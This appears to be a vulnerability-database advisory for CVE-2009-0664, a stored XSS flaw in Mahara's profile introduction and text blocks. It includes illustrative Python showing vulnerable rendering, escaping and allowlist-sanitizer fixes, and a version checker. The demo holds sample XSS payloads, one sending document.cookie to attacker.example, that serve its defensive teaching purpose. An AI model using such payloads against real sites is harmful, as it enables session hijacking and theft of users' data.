VYPR
Unrated severity · NVD Advisory · Published Apr 23, 2009 · Updated Apr 23, 2026

CVE-2009-0664

Description

Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0.x before 1.0.11 and 1.1.x before 1.1.3 allow remote attackers to inject arbitrary web script or HTML via (1) the introduction field in a user profile or (2) an arbitrary text block in a user view.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Mahara 1.0.x before 1.0.11 and 1.1.x before 1.1.3 contain stored XSS in the user profile introduction field and in arbitrary text blocks in user views, allowing any registered user to inject script that runs in the browser of whoever views the profile or view.

Vulnerability

Multiple cross-site scripting (XSS) vulnerabilities exist in Mahara versions 1.0.x before 1.0.11 and 1.1.x before 1.1.3. The flaws occur because user-supplied input is stored as submitted and later written into page HTML without being escaped or sanitized. Specifically, the (1) introduction field in a user profile and (2) an arbitrary text block in a user view allow an attacker to inject arbitrary web script or HTML [1].

Exploitation

An attacker with the ability to edit their own user profile or create a user view can inject malicious script into the introduction field or an arbitrary text block. Only an ordinary user account is required; no special network position or elevated privilege is needed. The injected content is stored on the server and then rendered in the browser of any user who views the affected profile or view, making this a stored (persistent) XSS attack [1].
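The two passages above describe a store-then-render bug: the field is saved as typed and interpolated into page markup when someone views it. The following added example (not Mahara code; the in-memory store, field names and payloads are constructed for the demonstration) shows the vulnerable rendering pattern beside two fixes that match the two affected fields. A plain-text introduction needs only HTML escaping on output; a text block that legitimately accepts some HTML needs an allowlist sanitizer that drops every tag and attribute not explicitly permitted. The sanitizer here is a deliberately small illustration of that second approach, not a substitute for a maintained library such as HTMLPurifier.

```python
"""Stored XSS of the kind described in CVE-2009-0664, reduced to its essentials:
a profile 'introduction' field and a view 'text block' are stored as submitted
and interpolated into HTML when someone views the page. Added illustrative
example, not Mahara code; the in-memory store, field names and payloads below
are constructed for the demo."""
import html
from html.parser import HTMLParser

PROFILES = {}  # constructed stand-in for the profile table: user -> introduction

# Constructed attacker input for the plain-text introduction field.
INTRO_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
# Constructed attacker input for a rich-text block: event handler, img/onerror, javascript: URL.
BLOCK_PAYLOAD = ('<p onclick="alert(1)">Hi <b>there</b></p>'
                 '<img src=x onerror="alert(document.cookie)">'
                 '<a href="javascript:alert(1)">x</a><a href="https://example.org">ok</a>')


def save_introduction(user, text):
    # Storing the raw string is not the bug; rendering it unescaped is.
    PROFILES[user] = text


def render_introduction_vulnerable(user):
    # The pattern behind the advisory: user text dropped straight into markup,
    # so the victim's browser executes whatever the attacker stored.
    return '<div class="intro">%s</div>' % PROFILES[user]


def render_introduction_fixed(user):
    # A plain-text field needs no markup at all: HTML-escape on output and the
    # payload is displayed as inert text.
    return '<div class="intro">%s</div>' % html.escape(PROFILES[user], quote=True)


class AllowlistSanitizer(HTMLParser):
    """Tiny allowlist sanitizer for a field that legitimately accepts some HTML.
    Keeps a few formatting tags, drops every other tag, drops all attributes
    except an http(s) href on <a>, and re-escapes text. Demonstration only; a
    real deployment should use a maintained library such as HTMLPurifier."""
    ALLOWED = {"p", "b", "i", "em", "strong", "a", "br"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.ALLOWED:
            return  # <script>, <img onerror=...>, <iframe> and friends vanish entirely
        kept = ""
        for name, value in attrs:
            # on*, style, src and the like are discarded; only a safe href survives
            if tag == "a" and name == "href" and value and \
                    value.strip().lower().startswith(("http://", "https://")):
                kept = ' href="%s"' % html.escape(value, quote=True)
        self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in self.ALLOWED and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # convert_charrefs decoded entities in the input; escape on the way out
        # so a '<' typed by the user stays a character rather than opening a tag.
        self.out.append(html.escape(data, quote=False))

    def result(self):
        return "".join(self.out)


def sanitize_text_block(raw):
    p = AllowlistSanitizer()
    p.feed(raw)
    p.close()
    return p.result()


if __name__ == "__main__":
    save_introduction("mallory", INTRO_PAYLOAD)
    print("vulnerable:", render_introduction_vulnerable("mallory"))
    print("fixed:     ", render_introduction_fixed("mallory"))
    print("sanitized: ", sanitize_text_block(BLOCK_PAYLOAD))
```

Running the block prints the raw `<script>` element in the vulnerable rendering, its entity-escaped form in the fixed rendering, and a text block reduced to `<p>Hi <b>there</b></p><a>x</a><a href="https://example.org">ok</a>`: the `onclick`, the `<img onerror>` and the `javascript:` URL are all gone while ordinary formatting and the https link survive. The design point is that the choice between escaping and sanitizing follows from what the field is for; both are applied at output time, so content already sitting in the database is covered.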

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of a victim's browser session. This can lead to session hijacking, theft of information visible to the victim, or actions performed on the victim's behalf within the Mahara application. The impact is bounded by the victim's privileges; a site administrator viewing the crafted profile or view would expose administrative actions [1].

Mitigation

The vulnerability is fixed in Mahara versions 1.0.11 and 1.1.3, which were released on the date of the security announcement [1]. Users are strongly advised to upgrade immediately. No workaround or mitigation short of patching has been identified in the available references.

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

    • cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*
    • (no CPE) range: >= 1.0.0, < 1.0.11; >= 1.1.0, < 1.1.3
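The affected-version ranges above and the upgrade advice in the Mitigation section reduce to one check: is the installed release inside >= 1.0.0, < 1.0.11 or >= 1.1.0, < 1.1.3? The following added script (not Mahara tooling) performs that check. It assumes, as the advisory does not say, that the installed release string can be read from a `$config->release = '...';` assignment in Mahara's `htdocs/lib/version.php`; the sample file contents are constructed for the demo, and pre-release suffixes such as `alpha1` or `rc2` are parsed so that the 1.1.0 pre-releases listed above are flagged.

```python
"""Check a Mahara release string against the CVE-2009-0664 affected ranges
(>= 1.0.0, < 1.0.11 and >= 1.1.0, < 1.1.3). Added example, not Mahara tooling.
Assumption: htdocs/lib/version.php carries a line of the form
    $config->release = '1.1.2';
The file contents used below are a constructed sample."""
import re

# (first affected, first fixed) per branch, taken from the advisory's ranges.
AFFECTED = [((1, 0, 0), (1, 0, 11)), ((1, 1, 0), (1, 1, 3))]

_RELEASE_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)[-. ]?([A-Za-z]+\d*)?")


def parse_release(release):
    """'1.1.0rc2' -> ((1, 1, 0), 'rc2'); '1.0.10' -> ((1, 0, 10), '')."""
    m = _RELEASE_RE.fullmatch(release.strip())
    if not m:
        raise ValueError("unrecognised release string: %r" % release)
    nums = tuple(int(x) for x in m.group(1, 2, 3))
    return nums, (m.group(4) or "").lower()


def is_affected(release):
    nums, pre = parse_release(release)
    for first_bad, first_fixed in AFFECTED:
        if first_bad <= nums < first_fixed:
            return True  # covers 1.1.0alpha1 .. 1.1.0rc2 as well as 1.1.0 itself
        if nums == first_fixed and pre:
            # Conservative assumption: a pre-release build of the fixed version
            # (e.g. '1.1.3rc1', if one existed) predates the fix and is treated as affected.
            return True
    return False


def release_from_version_php(text):
    m = re.search(r"\$config->release\s*=\s*['\"]([^'\"]+)['\"]", text)
    if not m:
        raise ValueError("no $config->release assignment found")
    return m.group(1)


# Constructed sample of the assumed version.php layout (not a real Mahara file).
SAMPLE_VERSION_PHP = """<?php
$config->version = 2009022600;
$config->release = '1.1.2';
"""


def check(version_php_text):
    """Return (release, affected) for the given version.php contents."""
    release = release_from_version_php(version_php_text)
    return release, is_affected(release)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_VERSION_PHP
    release, bad = check(text)
    print("Mahara %s: %s" % (release, "AFFECTED, upgrade to 1.0.11 / 1.1.3" if bad else "not in affected range"))
```

Run it with the path to `htdocs/lib/version.php` as the only argument, or with no argument to see the constructed sample (1.1.2) reported as affected. Because the check is purely on the version string it says nothing about whether a backported fix has been applied; on a vendor-patched package, confirm the fix from the package changelog instead.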

Patches


No patches discovered yet.

References

